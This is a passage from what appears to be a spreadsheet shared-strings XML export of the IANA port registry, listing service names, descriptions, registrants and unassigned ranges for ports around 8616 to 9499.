  <si>
    <t>Unauthorized Use Known on ports 8616 and 8617</t>
  </si>
  <si>
    <t>monetra</t>
  </si>
  <si>
    <t>Monetra</t>
  </si>
  <si>
    <t>[Main_Street_Softworks]</t>
  </si>
  <si>
    <t>[Brad_House]</t>
  </si>
  <si>
    <t>monetra-admin</t>
  </si>
  <si>
    <t>Monetra Administrative Access</t>
  </si>
  <si>
    <t>8667-8674</t>
  </si>
  <si>
    <t>msi-cps-rm</t>
  </si>
  <si>
    <t>Motorola Solutions Customer Programming Software for Radio Management</t>
  </si>
  <si>
    <t>[Motorola_Solutions_Inc]</t>
  </si>
  <si>
    <t>[Jenish_Amin]</t>
  </si>
  <si>
    <t>msi-cps-rm-disc</t>
  </si>
  <si>
    <t>Motorola Solutions Customer Programming Software for Radio Management Discovery</t>
  </si>
  <si>
    <t>8676-8685</t>
  </si>
  <si>
    <t>sun-as-jmxrmi</t>
  </si>
  <si>
    <t>Sun App Server - JMX/RMI</t>
  </si>
  <si>
    <t>openremote-ctrl</t>
  </si>
  <si>
    <t>OpenRemote Controller HTTP/REST</t>
  </si>
  <si>
    <t>[OpenRemote_Inc]</t>
  </si>
  <si>
    <t>[Juha_Lindfors]</t>
  </si>
  <si>
    <t>8689-8698</t>
  </si>
  <si>
    <t>vnyx</t>
  </si>
  <si>
    <t>VNYX Primary Port</t>
  </si>
  <si>
    <t>[Gregg_Green]</t>
  </si>
  <si>
    <t>8700-8709</t>
  </si>
  <si>
    <t>semi-grpc</t>
  </si>
  <si>
    <t>gRPC for SEMI Standards implementations</t>
  </si>
  <si>
    <t>[SEMI]</t>
  </si>
  <si>
    <t>[Albert_Fuchigami]</t>
  </si>
  <si>
    <t>nvc</t>
  </si>
  <si>
    <t>Nuance Voice Control</t>
  </si>
  <si>
    <t>[Nuance_Communications_Inc2]</t>
  </si>
  <si>
    <t>[Diego_Negre]</t>
  </si>
  <si>
    <t>8712-8731</t>
  </si>
  <si>
    <t>dtp-net</t>
  </si>
  <si>
    <t>DASGIP Net Services</t>
  </si>
  <si>
    <t>[Dr_Matthias_Arnold]</t>
  </si>
  <si>
    <t>ibus</t>
  </si>
  <si>
    <t>iBus</t>
  </si>
  <si>
    <t>[Silvano_Maffeis]</t>
  </si>
  <si>
    <t>8734-8749</t>
  </si>
  <si>
    <t>dey-keyneg</t>
  </si>
  <si>
    <t>DEY Storage Key Negotiation</t>
  </si>
  <si>
    <t>8751-8762</t>
  </si>
  <si>
    <t>mc-appserver</t>
  </si>
  <si>
    <t>MC-APPSERVER</t>
  </si>
  <si>
    <t>[Romeo_Kasanwidjojo]</t>
  </si>
  <si>
    <t>openqueue</t>
  </si>
  <si>
    <t>OPENQUEUE</t>
  </si>
  <si>
    <t>[Matt_Jensen]</t>
  </si>
  <si>
    <t>ultraseek-http</t>
  </si>
  <si>
    <t>Ultraseek HTTP</t>
  </si>
  <si>
    <t>[Walter_Underwood]</t>
  </si>
  <si>
    <t>amcs</t>
  </si>
  <si>
    <t>Agilent Connectivity Service</t>
  </si>
  <si>
    <t>[Keysight_Technologies_Inc]</t>
  </si>
  <si>
    <t>[Tom_Fay]</t>
  </si>
  <si>
    <t>core-of-source</t>
  </si>
  <si>
    <t>Online mobile multiplayer game</t>
  </si>
  <si>
    <t>[Alt_Solve_Sdn_Bhd]</t>
  </si>
  <si>
    <t>[Almaz_Hong]</t>
  </si>
  <si>
    <t>sandpolis</t>
  </si>
  <si>
    <t>Sandpolis Server</t>
  </si>
  <si>
    <t>[Tyler_Cook]</t>
  </si>
  <si>
    <t>oktaauthenticat</t>
  </si>
  <si>
    <t>Okta MultiPlatform Access Mgmt for Cloud Svcs</t>
  </si>
  <si>
    <t>[Okta_Inc]</t>
  </si>
  <si>
    <t>[Tom_Belote]</t>
  </si>
  <si>
    <t>dpap</t>
  </si>
  <si>
    <t>Digital Photo Access Protocol (iPhoto)</t>
  </si>
  <si>
    <t>[Amandeep_Jawa_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, Version, iPSh Version, Machine ID, Machine Name, Password</t>
  </si>
  <si>
    <t>8771-8777</t>
  </si>
  <si>
    <t>uec</t>
  </si>
  <si>
    <t>Stonebranch Universal Enterprise Controller</t>
  </si>
  <si>
    <t>8779-8785</t>
  </si>
  <si>
    <t>msgclnt</t>
  </si>
  <si>
    <t>Message Client</t>
  </si>
  <si>
    <t>[Michael_O_Brien]</t>
  </si>
  <si>
    <t>msgsrvr</t>
  </si>
  <si>
    <t>Message Server</t>
  </si>
  <si>
    <t>8788-8792</t>
  </si>
  <si>
    <t>acd-pm</t>
  </si>
  <si>
    <t>Accedian Performance Measurement</t>
  </si>
  <si>
    <t>[Marco_Mascitto]</t>
  </si>
  <si>
    <t>8794-8799</t>
  </si>
  <si>
    <t>sunwebadmin</t>
  </si>
  <si>
    <t>Sun Web Server Admin Service</t>
  </si>
  <si>
    <t>[Jyri_J_Virkki]</t>
  </si>
  <si>
    <t>8801-8803</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: Port 8801</t>
  </si>
  <si>
    <t>truecm</t>
  </si>
  <si>
    <t>[Scott_Kramer]</t>
  </si>
  <si>
    <t>pfcp</t>
  </si>
  <si>
    <t>Destination Port number for PFCP</t>
  </si>
  <si>
    <t>[Kimmo_Kymalainen]</t>
  </si>
  <si>
    <t>hes-clip</t>
  </si>
  <si>
    <t>HES-CLIP Interoperability protocol</t>
  </si>
  <si>
    <t>[Tim_Schoechle]</t>
  </si>
  <si>
    <t>[Ludo_Bertsch]</t>
  </si>
  <si>
    <t>ssports-bcast</t>
  </si>
  <si>
    <t>STATSports Broadcast Service</t>
  </si>
  <si>
    <t>[Statsports_International]</t>
  </si>
  <si>
    <t>[Catalin_Caranfil]</t>
  </si>
  <si>
    <t>3gpp-monp</t>
  </si>
  <si>
    <t>MCPTT Off-Network Protocol (MONP)</t>
  </si>
  <si>
    <t>[ThreeGPP_3]</t>
  </si>
  <si>
    <t>[Frederic_Firmin]</t>
  </si>
  <si>
    <t>8810-8872</t>
  </si>
  <si>
    <t>dxspider</t>
  </si>
  <si>
    <t>dxspider linking protocol</t>
  </si>
  <si>
    <t>[Dirk_Koopman]</t>
  </si>
  <si>
    <t>8874-8879</t>
  </si>
  <si>
    <t>cddbp-alt</t>
  </si>
  <si>
    <t>CDDBP</t>
  </si>
  <si>
    <t>galaxy4d</t>
  </si>
  <si>
    <t>Galaxy4D Online Game Engine</t>
  </si>
  <si>
    <t>[Galaxy4D]</t>
  </si>
  <si>
    <t>[Olivier_St-Laurent]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 8882</t>
  </si>
  <si>
    <t>secure-mqtt</t>
  </si>
  <si>
    <t>Secure MQTT</t>
  </si>
  <si>
    <t>8884-8887</t>
  </si>
  <si>
    <t>ddi-tcp-1</t>
  </si>
  <si>
    <t>NewsEDGE server TCP (TCP 1)</t>
  </si>
  <si>
    <t>[Fred_Yao]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 8888</t>
  </si>
  <si>
    <t>ddi-udp-1</t>
  </si>
  <si>
    <t>NewsEDGE server UDP (UDP 1)</t>
  </si>
  <si>
    <t>ddi-tcp-2</t>
  </si>
  <si>
    <t>Desktop Data TCP 1</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 8889</t>
  </si>
  <si>
    <t>ddi-udp-2</t>
  </si>
  <si>
    <t>NewsEDGE server broadcast</t>
  </si>
  <si>
    <t>ddi-tcp-3</t>
  </si>
  <si>
    <t>Desktop Data TCP 2</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 8890</t>
  </si>
  <si>
    <t>ddi-udp-3</t>
  </si>
  <si>
    <t>NewsEDGE client broadcast</t>
  </si>
  <si>
    <t>ddi-tcp-4</t>
  </si>
  <si>
    <t>Desktop Data TCP 3: NESS application</t>
  </si>
  <si>
    <t>ddi-udp-4</t>
  </si>
  <si>
    <t>Desktop Data UDP 3: NESS application</t>
  </si>
  <si>
    <t>ddi-tcp-5</t>
  </si>
  <si>
    <t>Desktop Data TCP 4: FARM product</t>
  </si>
  <si>
    <t>ddi-udp-5</t>
  </si>
  <si>
    <t>Desktop Data UDP 4: FARM product</t>
  </si>
  <si>
    <t>ddi-tcp-6</t>
  </si>
  <si>
    <t>Desktop Data TCP 5: NewsEDGE/Web application</t>
  </si>
  <si>
    <t>ddi-udp-6</t>
  </si>
  <si>
    <t>Desktop Data UDP 5: NewsEDGE/Web application</t>
  </si>
  <si>
    <t>ddi-tcp-7</t>
  </si>
  <si>
    <t>Desktop Data TCP 6: COAL application</t>
  </si>
  <si>
    <t>ddi-udp-7</t>
  </si>
  <si>
    <t>Desktop Data UDP 6: COAL application</t>
  </si>
  <si>
    <t>8895-8898</t>
  </si>
  <si>
    <t>ospf-lite</t>
  </si>
  <si>
    <t>[Matthew_Thomas]</t>
  </si>
  <si>
    <t>jmb-cds1</t>
  </si>
  <si>
    <t>JMB-CDS 1</t>
  </si>
  <si>
    <t>[Curtis_Bray]</t>
  </si>
  <si>
    <t>jmb-cds2</t>
  </si>
  <si>
    <t>JMB-CDS 2</t>
  </si>
  <si>
    <t>8902-8909</t>
  </si>
  <si>
    <t>manyone-http</t>
  </si>
  <si>
    <t>[Matt_King]</t>
  </si>
  <si>
    <t>manyone-xml</t>
  </si>
  <si>
    <t>wcbackup</t>
  </si>
  <si>
    <t>Windows Client Backup</t>
  </si>
  <si>
    <t>[Jim_Lyon]</t>
  </si>
  <si>
    <t>dragonfly</t>
  </si>
  <si>
    <t>Dragonfly System Service</t>
  </si>
  <si>
    <t>[Paul_Hodara]</t>
  </si>
  <si>
    <t>8914-8936</t>
  </si>
  <si>
    <t>twds</t>
  </si>
  <si>
    <t>Transaction Warehouse Data Service</t>
  </si>
  <si>
    <t>[Lance_M_Steenson]</t>
  </si>
  <si>
    <t>8938-8952</t>
  </si>
  <si>
    <t>ub-dns-control</t>
  </si>
  <si>
    <t>unbound dns nameserver control</t>
  </si>
  <si>
    <t>[NLnet_Labs_Support]</t>
  </si>
  <si>
    <t>cumulus-admin</t>
  </si>
  <si>
    <t>Cumulus Admin Port</t>
  </si>
  <si>
    <t>[Thomas_Schleu]</t>
  </si>
  <si>
    <t>8955-8979</t>
  </si>
  <si>
    <t>nod-provider</t>
  </si>
  <si>
    <t>Network of Devices Provider</t>
  </si>
  <si>
    <t>[David_Muller]</t>
  </si>
  <si>
    <t>nod-client</t>
  </si>
  <si>
    <t>Network of Devices Client</t>
  </si>
  <si>
    <t>8982-8988</t>
  </si>
  <si>
    <t>sunwebadmins</t>
  </si>
  <si>
    <t>Sun Web Server SSL Admin Service</t>
  </si>
  <si>
    <t>http-wmap</t>
  </si>
  <si>
    <t>webmail HTTP service</t>
  </si>
  <si>
    <t>https-wmap</t>
  </si>
  <si>
    <t>webmail HTTPS service</t>
  </si>
  <si>
    <t>8992-8996</t>
  </si>
  <si>
    <t>oracle-ms-ens</t>
  </si>
  <si>
    <t>Oracle Messaging Server Event Notification Service</t>
  </si>
  <si>
    <t>[Oracle_6]</t>
  </si>
  <si>
    <t>[Hubert_Vijay_Arokiasamy]</t>
  </si>
  <si>
    <t>canto-roboflow</t>
  </si>
  <si>
    <t>Canto RoboFlow Control</t>
  </si>
  <si>
    <t>[Canto]</t>
  </si>
  <si>
    <t>[Thomas_Schleu_2]</t>
  </si>
  <si>
    <t>bctp</t>
  </si>
  <si>
    <t>Brodos Crypto Trade Protocol</t>
  </si>
  <si>
    <t>[Alexander_Sahler]</t>
  </si>
  <si>
    <t>cslistener</t>
  </si>
  <si>
    <t>CSlistener</t>
  </si>
  <si>
    <t>[David_Jones]</t>
  </si>
  <si>
    <t>etlservicemgr</t>
  </si>
  <si>
    <t>ETL Service Manager</t>
  </si>
  <si>
    <t>[Stephen_McCrea]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 9001</t>
  </si>
  <si>
    <t>dynamid</t>
  </si>
  <si>
    <t>DynamID authentication</t>
  </si>
  <si>
    <t>[Jerome_Dusautois]</t>
  </si>
  <si>
    <t>9003-9004</t>
  </si>
  <si>
    <t>golem</t>
  </si>
  <si>
    <t>Golem Inter-System RPC</t>
  </si>
  <si>
    <t>[Jose_Luis_Tallon]</t>
  </si>
  <si>
    <t>De-Commissioned Port</t>
  </si>
  <si>
    <t>ogs-client</t>
  </si>
  <si>
    <t>Open Grid Services Client</t>
  </si>
  <si>
    <t>[Gareth_Nelson_2]</t>
  </si>
  <si>
    <t>ogs-server</t>
  </si>
  <si>
    <t>Open Grid Services Server</t>
  </si>
  <si>
    <t>pichat</t>
  </si>
  <si>
    <t>Pichat Server</t>
  </si>
  <si>
    <t>[Mark_Seuffert]</t>
  </si>
  <si>
    <t>sdr</t>
  </si>
  <si>
    <t>Secure Data Replicator Protocol</t>
  </si>
  <si>
    <t>[Sufyan_Almajali]</t>
  </si>
  <si>
    <t>d-star</t>
  </si>
  <si>
    <t>D-Star Routing digital voice+data for amateur radio</t>
  </si>
  <si>
    <t>[QuadNet2_USA_IRC_Network]</t>
  </si>
  <si>
    <t>[Thomas_A_Early]</t>
  </si>
  <si>
    <t>9012-9019</t>
  </si>
  <si>
    <t>tambora</t>
  </si>
  <si>
    <t>TAMBORA</t>
  </si>
  <si>
    <t>[Jason_van_Zyl]</t>
  </si>
  <si>
    <t>panagolin-ident</t>
  </si>
  <si>
    <t>Pangolin Identification</t>
  </si>
  <si>
    <t>[William_Benner_2]</t>
  </si>
  <si>
    <t>paragent</t>
  </si>
  <si>
    <t>PrivateArk Remote Agent</t>
  </si>
  <si>
    <t>[Gal_Cucuy]</t>
  </si>
  <si>
    <t>swa-1</t>
  </si>
  <si>
    <t>Secure Web Access - 1</t>
  </si>
  <si>
    <t>[Tim_McGranaghan]</t>
  </si>
  <si>
    <t>swa-2</t>
  </si>
  <si>
    <t>Secure Web Access - 2</t>
  </si>
  <si>
    <t>swa-3</t>
  </si>
  <si>
    <t>Secure Web Access - 3</t>
  </si>
  <si>
    <t>swa-4</t>
  </si>
  <si>
    <t>Secure Web Access - 4</t>
  </si>
  <si>
    <t>9027-9049</t>
  </si>
  <si>
    <t>versiera</t>
  </si>
  <si>
    <t>Versiera Agent Listener</t>
  </si>
  <si>
    <t>[Frank_Pikelner]</t>
  </si>
  <si>
    <t>fio-cmgmt</t>
  </si>
  <si>
    <t>Fusion-io Central Manager Service</t>
  </si>
  <si>
    <t>[Jim_Sermersheim]</t>
  </si>
  <si>
    <t>9052-9059</t>
  </si>
  <si>
    <t>CardWeb-IO</t>
  </si>
  <si>
    <t>CardWeb request-response I/O exchange</t>
  </si>
  <si>
    <t>[Virtual_Electric_Inc]</t>
  </si>
  <si>
    <t>[David_Wyatt]</t>
  </si>
  <si>
    <t>CardWeb-RT</t>
  </si>
  <si>
    <t>CardWeb realtime device data</t>
  </si>
  <si>
    <t>9061-9079</t>
  </si>
  <si>
    <t>glrpc</t>
  </si>
  <si>
    <t>Groove GLRPC</t>
  </si>
  <si>
    <t>[Adrian_Popescu]</t>
  </si>
  <si>
    <t>cisco-aqos</t>
  </si>
  <si>
    <t>Required for Adaptive Quality of Service</t>
  </si>
  <si>
    <t>[Manish_Surolia]</t>
  </si>
  <si>
    <t>lcs-ap</t>
  </si>
  <si>
    <t>LCS Application Protocol</t>
  </si>
  <si>
    <t>emc-pp-mgmtsvc</t>
  </si>
  <si>
    <t>EMC PowerPath Mgmt Service</t>
  </si>
  <si>
    <t>[Jim_Perreault]</t>
  </si>
  <si>
    <t>aurora</t>
  </si>
  <si>
    <t>IBM AURORA Performance Visualizer</t>
  </si>
  <si>
    <t>[Jeroen_Massar_2]</t>
  </si>
  <si>
    <t>ibm-rsyscon</t>
  </si>
  <si>
    <t>IBM Remote System Console</t>
  </si>
  <si>
    <t>[William_LePera]</t>
  </si>
  <si>
    <t>net2display</t>
  </si>
  <si>
    <t>Vesa Net2Display</t>
  </si>
  <si>
    <t>[Kenneth_B_Ocheltree]</t>
  </si>
  <si>
    <t>classic</t>
  </si>
  <si>
    <t>Classic Data Server</t>
  </si>
  <si>
    <t>[Paul_Cadarette]</t>
  </si>
  <si>
    <t>sqlexec</t>
  </si>
  <si>
    <t>IBM Informix SQL Interface</t>
  </si>
  <si>
    <t>[Jonathan_Leffler]</t>
  </si>
  <si>
    <t>sqlexec-ssl</t>
  </si>
  <si>
    <t>IBM Informix SQL Interface - Encrypted</t>
  </si>
  <si>
    <t>websm</t>
  </si>
  <si>
    <t>WebSM</t>
  </si>
  <si>
    <t>[I_Hsing_Tsao]</t>
  </si>
  <si>
    <t>xmltec-xmlmail</t>
  </si>
  <si>
    <t>[Mitch_Kaufman]</t>
  </si>
  <si>
    <t>XmlIpcRegSvc</t>
  </si>
  <si>
    <t>Xml-Ipc Server Reg</t>
  </si>
  <si>
    <t>[Casey_Harrington]</t>
  </si>
  <si>
    <t>copycat</t>
  </si>
  <si>
    <t>Copycat database replication service</t>
  </si>
  <si>
    <t>[Microtec_Informatique]</t>
  </si>
  <si>
    <t>[Raphael_Neve]</t>
  </si>
  <si>
    <t>9094-9099</t>
  </si>
  <si>
    <t>hp-pdl-datastr</t>
  </si>
  <si>
    <t>PDL Data Streaming Port</t>
  </si>
  <si>
    <t>pdl-datastream</t>
  </si>
  <si>
    <t>Printer PDL Data Stream</t>
  </si>
  <si>
    <t>[Stuart_Cheshire_4]</t>
  </si>
  <si>
    <t>The protocol name "pdl-datastream" is primarily registered for use
in DNS SRV records (RFC 2782). DNS SRV records allow a protocol to run on
any port number, but the default port for this protocol is 9100.</t>
  </si>
  <si>
    <t>bacula-dir</t>
  </si>
  <si>
    <t>Bacula Director</t>
  </si>
  <si>
    <t>[Kern_Sibbald]</t>
  </si>
  <si>
    <t>2002-01</t>
  </si>
  <si>
    <t>bacula-fd</t>
  </si>
  <si>
    <t>Bacula File Daemon</t>
  </si>
  <si>
    <t>bacula-sd</t>
  </si>
  <si>
    <t>Bacula Storage Daemon</t>
  </si>
  <si>
    <t>peerwire</t>
  </si>
  <si>
    <t>PeerWire</t>
  </si>
  <si>
    <t>[Steven_Gerhardt]</t>
  </si>
  <si>
    <t>xadmin</t>
  </si>
  <si>
    <t>Xadmin Control Service</t>
  </si>
  <si>
    <t>[AriâˆšÂ´n Huisken &lt;xadmin&amp;huisken-systems.nl&gt; 15 June 2009]</t>
  </si>
  <si>
    <t>astergate</t>
  </si>
  <si>
    <t>Astergate Control Service</t>
  </si>
  <si>
    <t>[Ari_Huisken]</t>
  </si>
  <si>
    <t>astergate-disc</t>
  </si>
  <si>
    <t>Astergate Discovery Service</t>
  </si>
  <si>
    <t>astergatefax</t>
  </si>
  <si>
    <t>AstergateFax Control Service</t>
  </si>
  <si>
    <t>[Gijs_Middelkamp]</t>
  </si>
  <si>
    <t>9108-9110</t>
  </si>
  <si>
    <t>hexxorecore</t>
  </si>
  <si>
    <t>Multiple Purpose, Distributed Message Bus</t>
  </si>
  <si>
    <t>[Hexxore]</t>
  </si>
  <si>
    <t>[Patrick_Roozeboom]</t>
  </si>
  <si>
    <t>9112-9118</t>
  </si>
  <si>
    <t>mxit</t>
  </si>
  <si>
    <t>MXit Instant Messaging</t>
  </si>
  <si>
    <t>[Marnus_Freeman]</t>
  </si>
  <si>
    <t>9120-9121</t>
  </si>
  <si>
    <t>grcmp</t>
  </si>
  <si>
    <t>Global Relay compliant mobile instant messaging protocol</t>
  </si>
  <si>
    <t>[Global_Relay]</t>
  </si>
  <si>
    <t>[Mike_Sample]</t>
  </si>
  <si>
    <t>grcp</t>
  </si>
  <si>
    <t>Global Relay compliant instant messaging protocol</t>
  </si>
  <si>
    <t>9124-9130</t>
  </si>
  <si>
    <t>dddp</t>
  </si>
  <si>
    <t>Dynamic Device Discovery</t>
  </si>
  <si>
    <t>[Shane_Dick]</t>
  </si>
  <si>
    <t>9132-9159</t>
  </si>
  <si>
    <t>apani1</t>
  </si>
  <si>
    <t>[Neal_Taylor]</t>
  </si>
  <si>
    <t>apani2</t>
  </si>
  <si>
    <t>apani3</t>
  </si>
  <si>
    <t>apani4</t>
  </si>
  <si>
    <t>apani5</t>
  </si>
  <si>
    <t>9165-9190</t>
  </si>
  <si>
    <t>sun-as-jpda</t>
  </si>
  <si>
    <t>Sun AppSvr JPDA</t>
  </si>
  <si>
    <t>9192-9199</t>
  </si>
  <si>
    <t>wap-wsp</t>
  </si>
  <si>
    <t>WAP connectionless session service</t>
  </si>
  <si>
    <t>wap-wsp-wtp</t>
  </si>
  <si>
    <t>WAP session service</t>
  </si>
  <si>
    <t>wap-wsp-s</t>
  </si>
  <si>
    <t>WAP secure connectionless session service</t>
  </si>
  <si>
    <t>wap-wsp-wtp-s</t>
  </si>
  <si>
    <t>WAP secure session service</t>
  </si>
  <si>
    <t>wap-vcard</t>
  </si>
  <si>
    <t>WAP vCard</t>
  </si>
  <si>
    <t>wap-vcal</t>
  </si>
  <si>
    <t>WAP vCal</t>
  </si>
  <si>
    <t>wap-vcard-s</t>
  </si>
  <si>
    <t>WAP vCard Secure</t>
  </si>
  <si>
    <t>wap-vcal-s</t>
  </si>
  <si>
    <t>WAP vCal Secure</t>
  </si>
  <si>
    <t>rjcdb-vcards</t>
  </si>
  <si>
    <t>rjcdb vCard</t>
  </si>
  <si>
    <t>[Robert_John_Churchil]</t>
  </si>
  <si>
    <t>almobile-system</t>
  </si>
  <si>
    <t>ALMobile System Service</t>
  </si>
  <si>
    <t>[Rob_Graber]</t>
  </si>
  <si>
    <t>oma-mlp</t>
  </si>
  <si>
    <t>OMA Mobile Location Protocol</t>
  </si>
  <si>
    <t>[Hans_Rohnert]</t>
  </si>
  <si>
    <t>oma-mlp-s</t>
  </si>
  <si>
    <t>OMA Mobile Location Protocol Secure</t>
  </si>
  <si>
    <t>serverviewdbms</t>
  </si>
  <si>
    <t>Server View dbms access</t>
  </si>
  <si>
    <t>serverstart</t>
  </si>
  <si>
    <t>ServerStart RemoteControl</t>
  </si>
  <si>
    <t>ipdcesgbs</t>
  </si>
  <si>
    <t>IPDC ESG BootstrapService</t>
  </si>
  <si>
    <t>[Joerg_Heuer]</t>
  </si>
  <si>
    <t>insis</t>
  </si>
  <si>
    <t>Integrated Setup and Install Service</t>
  </si>
  <si>
    <t>acme</t>
  </si>
  <si>
    <t>Aionex Communication Management Engine</t>
  </si>
  <si>
    <t>[Mark_Sapp]</t>
  </si>
  <si>
    <t>fsc-port</t>
  </si>
  <si>
    <t>FSC Communication Port</t>
  </si>
  <si>
    <t>[Teijo_Mustonen]</t>
  </si>
  <si>
    <t>9218-9221</t>
  </si>
  <si>
    <t>teamcoherence</t>
  </si>
  <si>
    <t>QSC Team Coherence</t>
  </si>
  <si>
    <t>[Ewan_McNab]</t>
  </si>
  <si>
    <t>9223-9254</t>
  </si>
  <si>
    <t>Manager On Network</t>
  </si>
  <si>
    <t>[David_Rouchet]</t>
  </si>
  <si>
    <t>9256-9276</t>
  </si>
  <si>
    <t>traingpsdata</t>
  </si>
  <si>
    <t>GPS Data transmitted from train to ground network</t>
  </si>
  <si>
    <t>[Alstom_Transport_Preston]</t>
  </si>
  <si>
    <t>[Paul_Steane]</t>
  </si>
  <si>
    <t>pegasus</t>
  </si>
  <si>
    <t>Pegasus GPS Platform</t>
  </si>
  <si>
    <t>[Nestor_A_Diaz]</t>
  </si>
  <si>
    <t>pegasus-ctl</t>
  </si>
  <si>
    <t>Pegaus GPS System Control Interface</t>
  </si>
  <si>
    <t>pgps</t>
  </si>
  <si>
    <t>Predicted GPS</t>
  </si>
  <si>
    <t>[Jeremy_Freeman]</t>
  </si>
  <si>
    <t>swtp-port1</t>
  </si>
  <si>
    <t>SofaWare transport port 1</t>
  </si>
  <si>
    <t>[Amir_Rapson]</t>
  </si>
  <si>
    <t>swtp-port2</t>
  </si>
  <si>
    <t>SofaWare transport port 2</t>
  </si>
  <si>
    <t>callwaveiam</t>
  </si>
  <si>
    <t>CallWaveIAM</t>
  </si>
  <si>
    <t>[Colin_Kelley]</t>
  </si>
  <si>
    <t>visd</t>
  </si>
  <si>
    <t>VERITAS Information Serve</t>
  </si>
  <si>
    <t>[Ravi_Tavakely]</t>
  </si>
  <si>
    <t>n2h2server</t>
  </si>
  <si>
    <t>N2H2 Filter Service Port</t>
  </si>
  <si>
    <t>[Jim_Irwin]</t>
  </si>
  <si>
    <t>n2receive</t>
  </si>
  <si>
    <t>n2 monitoring receiver</t>
  </si>
  <si>
    <t>[Peter_van_Dijk]</t>
  </si>
  <si>
    <t>cumulus</t>
  </si>
  <si>
    <t>Cumulus</t>
  </si>
  <si>
    <t>9288-9291</t>
  </si>
  <si>
    <t>armtechdaemon</t>
  </si>
  <si>
    <t>ArmTech Daemon</t>
  </si>
  <si>
    <t>[Rohan_Story]</t>
  </si>
  <si>
    <t>storview</t>
  </si>
  <si>
    <t>StorView Client</t>
  </si>
  <si>
    <t>[Ryan_Smith]</t>
  </si>
  <si>
    <t>armcenterhttp</t>
  </si>
  <si>
    <t>ARMCenter http Service</t>
  </si>
  <si>
    <t>[Eric_Thiebaut_George]</t>
  </si>
  <si>
    <t>armcenterhttps</t>
  </si>
  <si>
    <t>ARMCenter https Service</t>
  </si>
  <si>
    <t>9296-9299</t>
  </si>
  <si>
    <t>vrace</t>
  </si>
  <si>
    <t>Virtual Racing Service</t>
  </si>
  <si>
    <t>[Pete_Loeffen]</t>
  </si>
  <si>
    <t>9301-9305</t>
  </si>
  <si>
    <t>sphinxql</t>
  </si>
  <si>
    <t>Sphinx search server (MySQL listener)</t>
  </si>
  <si>
    <t>[Andrew_Aksyonoff]</t>
  </si>
  <si>
    <t>9307-9309</t>
  </si>
  <si>
    <t>sapms</t>
  </si>
  <si>
    <t>SAP Message Server</t>
  </si>
  <si>
    <t>[SAP_SE]</t>
  </si>
  <si>
    <t>[Stefan_Hagen]</t>
  </si>
  <si>
    <t>sphinxapi</t>
  </si>
  <si>
    <t>Sphinx search server</t>
  </si>
  <si>
    <t>9313-9317</t>
  </si>
  <si>
    <t>secure-ts</t>
  </si>
  <si>
    <t>PKIX TimeStamp over TLS</t>
  </si>
  <si>
    <t>[Niklas_Weiss]</t>
  </si>
  <si>
    <t>9319-9320</t>
  </si>
  <si>
    <t>guibase</t>
  </si>
  <si>
    <t>9322-9338</t>
  </si>
  <si>
    <t>gnmi-gnoi</t>
  </si>
  <si>
    <t>gRPC Network Mgmt/Operations Interface</t>
  </si>
  <si>
    <t>[Google_Netops]</t>
  </si>
  <si>
    <t>[gNxi_Maintainers]</t>
  </si>
  <si>
    <t>9340-9342</t>
  </si>
  <si>
    <t>mpidcmgr</t>
  </si>
  <si>
    <t>MpIdcMgr</t>
  </si>
  <si>
    <t>mphlpdmc</t>
  </si>
  <si>
    <t>Mphlpdmc</t>
  </si>
  <si>
    <t>rancher</t>
  </si>
  <si>
    <t>Rancher Agent</t>
  </si>
  <si>
    <t>[Rancher_Labs_Inc]</t>
  </si>
  <si>
    <t>[Vincent_Fiduccia]</t>
  </si>
  <si>
    <t>ctechlicensing</t>
  </si>
  <si>
    <t>C Tech Licensing</t>
  </si>
  <si>
    <t>[Reed_Copsey_Jr]</t>
  </si>
  <si>
    <t>9347-9373</t>
  </si>
  <si>
    <t>fjdmimgr</t>
  </si>
  <si>
    <t>9375-9379</t>
  </si>
  <si>
    <t>boxp</t>
  </si>
  <si>
    <t>Brivs! Open Extensible Protocol</t>
  </si>
  <si>
    <t>9381-9386</t>
  </si>
  <si>
    <t>d2dconfig</t>
  </si>
  <si>
    <t>D2D Configuration Service</t>
  </si>
  <si>
    <t>[Pete_Camble]</t>
  </si>
  <si>
    <t>d2ddatatrans</t>
  </si>
  <si>
    <t>D2D Data Transfer Service</t>
  </si>
  <si>
    <t>adws</t>
  </si>
  <si>
    <t>Active Directory Web Services</t>
  </si>
  <si>
    <t>[Nitin_Gupta]</t>
  </si>
  <si>
    <t>otp</t>
  </si>
  <si>
    <t>OpenVAS Transfer Protocol</t>
  </si>
  <si>
    <t>[Tim_Brown]</t>
  </si>
  <si>
    <t>9391-9395</t>
  </si>
  <si>
    <t>fjinvmgr</t>
  </si>
  <si>
    <t>mpidcagt</t>
  </si>
  <si>
    <t>MpIdcAgt</t>
  </si>
  <si>
    <t>9398-9399</t>
  </si>
  <si>
    <t>sec-t4net-srv</t>
  </si>
  <si>
    <t>Samsung Twain for Network Server</t>
  </si>
  <si>
    <t>[Dongkeun_Kim]</t>
  </si>
  <si>
    <t>sec-t4net-clt</t>
  </si>
  <si>
    <t>Samsung Twain for Network Client</t>
  </si>
  <si>
    <t>sec-pc2fax-srv</t>
  </si>
  <si>
    <t>Samsung PC2FAX for Network Server</t>
  </si>
  <si>
    <t>[HyeongBae_Yu]</t>
  </si>
  <si>
    <t>9403-9417</t>
  </si>
  <si>
    <t>git</t>
  </si>
  <si>
    <t>git pack transfer service</t>
  </si>
  <si>
    <t>[Linus_Torvalds]</t>
  </si>
  <si>
    <t>9419-9442</t>
  </si>
  <si>
    <t>tungsten-https</t>
  </si>
  <si>
    <t>WSO2 Tungsten HTTPS</t>
  </si>
  <si>
    <t>[Afkham_Azeez]</t>
  </si>
  <si>
    <t>wso2esb-console</t>
  </si>
  <si>
    <t>WSO2 ESB Administration Console HTTPS</t>
  </si>
  <si>
    <t>mindarray-ca</t>
  </si>
  <si>
    <t>MindArray Systems Console Agent</t>
  </si>
  <si>
    <t>[MINDARRAY_SYSTEMS]</t>
  </si>
  <si>
    <t>[ALPESH_DHAMELIA]</t>
  </si>
  <si>
    <t>9446-9449</t>
  </si>
  <si>
    <t>sntlkeyssrvr</t>
  </si>
  <si>
    <t>Sentinel Keys Server</t>
  </si>
  <si>
    <t>[Martin_Ziskind]</t>
  </si>
  <si>
    <t>9451-9499</t>
  </si>
  <si>
